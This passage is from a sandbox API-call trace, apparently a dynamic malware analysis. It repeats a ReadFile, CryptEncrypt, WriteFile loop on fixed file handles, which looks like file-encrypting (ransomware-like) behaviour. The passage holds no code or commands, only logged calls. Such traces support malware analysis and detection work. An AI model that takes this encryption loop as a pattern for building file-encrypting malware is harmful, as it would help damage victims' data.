lpOverlapped=0x0) returned 1 [0269.450] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.451] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.451] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.452] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.452] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.452] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.452] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.452] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.452] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.452] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.453] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.453] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.453] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.453] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.453] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.454] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.454] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.455] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.455] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.455] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.455] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.455] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.455] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.456] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.456] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.456] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.456] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.456] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.456] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.456] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.457] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.457] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.458] CryptEncrypt (in: hKey=0x2fa948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 